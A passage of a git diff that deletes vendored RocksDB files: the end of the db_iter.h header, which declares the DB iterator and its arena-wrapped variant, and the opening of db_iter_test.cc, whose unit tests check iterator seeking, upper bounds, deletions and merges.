-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdint.h>
-#include <string>
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/range_del_aggregator.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class Arena;
-class DBIter;
-class InternalIterator;
-
-// Return a new iterator that converts internal keys (yielded by
-// "*internal_iter") that were live at the specified "sequence" number
-// into appropriate user keys.
-extern Iterator* NewDBIterator(Env* env, const ReadOptions& read_options,
-                               const ImmutableCFOptions& cf_options,
-                               const Comparator* user_key_comparator,
-                               InternalIterator* internal_iter,
-                               const SequenceNumber& sequence,
-                               uint64_t max_sequential_skip_in_iterations,
-                               bool allow_blob = false);
-
-// A wrapper iterator which wraps DB Iterator and the arena, with which the DB
-// iterator is supposed be allocated. This class is used as an entry point of
-// a iterator hierarchy whose memory can be allocated inline. In that way,
-// accessing the iterator tree can be more cache friendly. It is also faster
-// to allocate.
-class ArenaWrappedDBIter : public Iterator {
- public:
-  virtual ~ArenaWrappedDBIter();
-
-  // Get the arena to be used to allocate memory for DBIter to be wrapped,
-  // as well as child iterators in it.
-  virtual Arena* GetArena() { return &arena_; }
-  virtual RangeDelAggregator* GetRangeDelAggregator();
-
-  // Set the internal iterator wrapped inside the DB Iterator. Usually it is
-  // a merging iterator.
-  virtual void SetIterUnderDBIter(InternalIterator* iter);
-  virtual bool Valid() const override;
-  virtual void SeekToFirst() override;
-  virtual void SeekToLast() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void Next() override;
-  virtual void Prev() override;
-  virtual Slice key() const override;
-  virtual Slice value() const override;
-  virtual Status status() const override;
-  virtual Status Refresh() override;
-  bool IsBlob() const;
-
-  virtual Status GetProperty(std::string prop_name, std::string* prop) override;
-
-  void Init(Env* env, const ReadOptions& read_options,
-            const ImmutableCFOptions& cf_options,
-            const SequenceNumber& sequence,
-            uint64_t max_sequential_skip_in_iterations, uint64_t version_number,
-            bool allow_blob);
-
-  void StoreRefreshInfo(const ReadOptions& read_options, DBImpl* db_impl,
-                        ColumnFamilyData* cfd, bool allow_blob) {
-    read_options_ = read_options;
-    db_impl_ = db_impl;
-    cfd_ = cfd;
-    allow_blob_ = allow_blob;
-  }
-
- private:
-  DBIter* db_iter_;
-  Arena arena_;
-  uint64_t sv_number_;
-  ColumnFamilyData* cfd_ = nullptr;
-  DBImpl* db_impl_ = nullptr;
-  ReadOptions read_options_;
-  bool allow_blob_ = false;
-};
-
-// Generate the arena wrapped iterator class.
-// `db_impl` and `cfd` are used for reneweal. If left null, renewal will not
-// be supported.
-extern ArenaWrappedDBIter* NewArenaWrappedDbIterator(
-    Env* env, const ReadOptions& read_options,
-    const ImmutableCFOptions& cf_options, const SequenceNumber& sequence,
-    uint64_t max_sequential_skip_in_iterations, uint64_t version_number,
-    DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr,
-    bool allow_blob = false);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_iter_test.cc b/thirdparty/rocksdb/db/db_iter_test.cc
deleted file mode 100644
index 6db3b4a..0000000
--- a/thirdparty/rocksdb/db/db_iter_test.cc
+++ /dev/null
@@ -1,2804 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-#include <vector>
-#include <algorithm>
-#include <utility>
-
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "table/iterator_wrapper.h"
-#include "table/merging_iterator.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-static uint64_t TestGetTickerCount(const Options& options,
-                                   Tickers ticker_type) {
-  return options.statistics->getTickerCount(ticker_type);
-}
-
-class TestIterator : public InternalIterator {
- public:
-  explicit TestIterator(const Comparator* comparator)
-      : initialized_(false),
-        valid_(false),
-        sequence_number_(0),
-        iter_(0),
-        cmp(comparator) {}
-
-  void AddPut(std::string argkey, std::string argvalue) {
-    Add(argkey, kTypeValue, argvalue);
-  }
-
-  void AddDeletion(std::string argkey) {
-    Add(argkey, kTypeDeletion, std::string());
-  }
-
-  void AddSingleDeletion(std::string argkey) {
-    Add(argkey, kTypeSingleDeletion, std::string());
-  }
-
-  void AddMerge(std::string argkey, std::string argvalue) {
-    Add(argkey, kTypeMerge, argvalue);
-  }
-
-  void Add(std::string argkey, ValueType type, std::string argvalue) {
-    Add(argkey, type, argvalue, sequence_number_++);
-  }
-
-  void Add(std::string argkey, ValueType type, std::string argvalue,
-           size_t seq_num, bool update_iter = false) {
-    valid_ = true;
-    ParsedInternalKey internal_key(argkey, seq_num, type);
-    data_.push_back(
-        std::pair<std::string, std::string>(std::string(), argvalue));
-    AppendInternalKey(&data_.back().first, internal_key);
-    if (update_iter && valid_ && cmp.Compare(data_.back().first, key()) < 0) {
-      // insert a key smaller than current key
-      Finish();
-      // data_[iter_] is not anymore the current element of the iterator.
-      // Increment it to reposition it to the right position.
-      iter_++;
-    }
-  }
-
-  // should be called before operations with iterator
-  void Finish() {
-    initialized_ = true;
-    std::sort(data_.begin(), data_.end(),
-              [this](std::pair<std::string, std::string> a,
-                     std::pair<std::string, std::string> b) {
-      return (cmp.Compare(a.first, b.first) < 0);
-    });
-  }
-
-  virtual bool Valid() const override {
-    assert(initialized_);
-    return valid_;
-  }
-
-  virtual void SeekToFirst() override {
-    assert(initialized_);
-    valid_ = (data_.size() > 0);
-    iter_ = 0;
-  }
-
-  virtual void SeekToLast() override {
-    assert(initialized_);
-    valid_ = (data_.size() > 0);
-    iter_ = data_.size() - 1;
-  }
-
-  virtual void Seek(const Slice& target) override {
-    assert(initialized_);
-    SeekToFirst();
-    if (!valid_) {
-      return;
-    }
-    while (iter_ < data_.size() &&
-           (cmp.Compare(data_[iter_].first, target) < 0)) {
-      ++iter_;
-    }
-
-    if (iter_ == data_.size()) {
-      valid_ = false;
-    }
-  }
-
-  virtual void SeekForPrev(const Slice& target) override {
-    assert(initialized_);
-    SeekForPrevImpl(target, &cmp);
-  }
-
-  virtual void Next() override {
-    assert(initialized_);
-    if (data_.empty() || (iter_ == data_.size() - 1)) {
-      valid_ = false;
-    } else {
-      ++iter_;
-    }
-  }
-
-  virtual void Prev() override {
-    assert(initialized_);
-    if (iter_ == 0) {
-      valid_ = false;
-    } else {
-      --iter_;
-    }
-  }
-
-  virtual Slice key() const override {
-    assert(initialized_);
-    return data_[iter_].first;
-  }
-
-  virtual Slice value() const override {
-    assert(initialized_);
-    return data_[iter_].second;
-  }
-
-  virtual Status status() const override {
-    assert(initialized_);
-    return Status::OK();
-  }
-
-  virtual bool IsKeyPinned() const override { return true; }
-  virtual bool IsValuePinned() const override { return true; }
-
- private:
-  bool initialized_;
-  bool valid_;
-  size_t sequence_number_;
-  size_t iter_;
-
-  InternalKeyComparator cmp;
-  std::vector<std::pair<std::string, std::string>> data_;
-};
-
-class DBIteratorTest : public testing::Test {
- public:
-  Env* env_;
-
-  DBIteratorTest() : env_(Env::Default()) {}
-};
-
-TEST_F(DBIteratorTest, DBIteratorPrevNext) {
-  Options options;
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddPut("a", "val_a");
-
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-  // Test to check the SeekToLast() with iterate_upper_bound not set
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-  }
-
-  // Test to check the SeekToLast() with iterate_upper_bound set
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->AddPut("f", "val_f");
-    internal_iter->Finish();
-
-    Slice prefix("d");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-  }
-  // Test to check the SeekToLast() iterate_upper_bound set to a key that
-  // is not Put yet
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->Finish();
-
-    Slice prefix("z");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-  }
-  // Test to check the SeekToLast() with iterate_upper_bound set to the
-  // first key
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    Slice prefix("a");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-  // Test case to check SeekToLast with iterate_upper_bound set
-  // (same key put may times - SeekToLast should start with the
-  // maximum sequence id of the upper bound)
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      7, options.max_sequential_skip_in_iterations));
-
-    SetPerfLevel(kEnableCount);
-    ASSERT_TRUE(GetPerfLevel() == kEnableCount);
-
-    get_perf_context()->Reset();
-    db_iter->SeekToLast();
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_key_skipped_count), 7);
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-
-    SetPerfLevel(kDisable);
-  }
-  // Test to check the SeekToLast() with the iterate_upper_bound set
-  // (Checking the value of the key which has sequence ids greater than
-  // and less that the iterator's sequence id)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-
-    internal_iter->AddPut("a", "val_a1");
-    internal_iter->AddPut("a", "val_a2");
-    internal_iter->AddPut("b", "val_b1");
-    internal_iter->AddPut("c", "val_c1");
-    internal_iter->AddPut("c", "val_c2");
-    internal_iter->AddPut("c", "val_c3");
-    internal_iter->AddPut("b", "val_b2");
-    internal_iter->AddPut("d", "val_d1");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      4, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b1");
-  }
-
-  // Test to check the SeekToLast() with the iterate_upper_bound set to the
-  // key that is deleted
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    Slice prefix("a");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-  // Test to check the SeekToLast() with the iterate_upper_bound set
-  // (Deletion cases)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-  }
-  // Test to check the SeekToLast() with iterate_upper_bound set
-  // (Deletion cases - Lot of internal keys after the upper_bound
-  // is deleted)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("e");
-    internal_iter->AddDeletion("f");
-    internal_iter->AddDeletion("g");
-    internal_iter->AddDeletion("h");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      7, options.max_sequential_skip_in_iterations));
-
-    SetPerfLevel(kEnableCount);
-    ASSERT_TRUE(GetPerfLevel() == kEnableCount);
-
-    get_perf_context()->Reset();
-    db_iter->SeekToLast();
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_delete_skipped_count), 1);
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-
-    SetPerfLevel(kDisable);
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddPut("a", "val_a");
-
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorEmpty) {
-  Options options;
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-  ReadOptions ro;
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorUseSkipCountSkips) {
-  ReadOptions ro;
-  Options options;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  for (size_t i = 0; i < 200; ++i) {
-    internal_iter->AddPut("a", "a");
-    internal_iter->AddPut("b", "b");
-    internal_iter->AddPut("c", "c");
-  }
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 2, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToLast();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "c");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 1u);
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "b");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 2u);
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "a");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 3u);
-
-  db_iter->Prev();
-  ASSERT_TRUE(!db_iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 3u);
-}
-
-TEST_F(DBIteratorTest, DBIteratorUseSkip) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddPut("c", ToString(k));
-      }
-      internal_iter->Finish();
-
-      options.statistics = rocksdb::CreateDBStatistics();
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), ToString(i));
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddDeletion("c");
-      }
-      internal_iter->AddPut("c", "200");
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-
-    {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t i = 0; i < 200; ++i) {
-        internal_iter->AddDeletion("c");
-      }
-      internal_iter->AddPut("c", "200");
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, 202,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), "200");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddDeletion("c");
-      }
-      internal_iter->AddPut("c", "200");
-      internal_iter->Finish();
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(!db_iter->Valid());
-
-      db_iter->SeekToFirst();
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    for (size_t i = 0; i < 200; ++i) {
-      internal_iter->AddDeletion("c");
-    }
-    internal_iter->AddPut("c", "200");
-    internal_iter->Finish();
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      200, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "200");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "200");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddPut("d", ToString(k));
-      }
-
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddPut("c", ToString(k));
-      }
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "d");
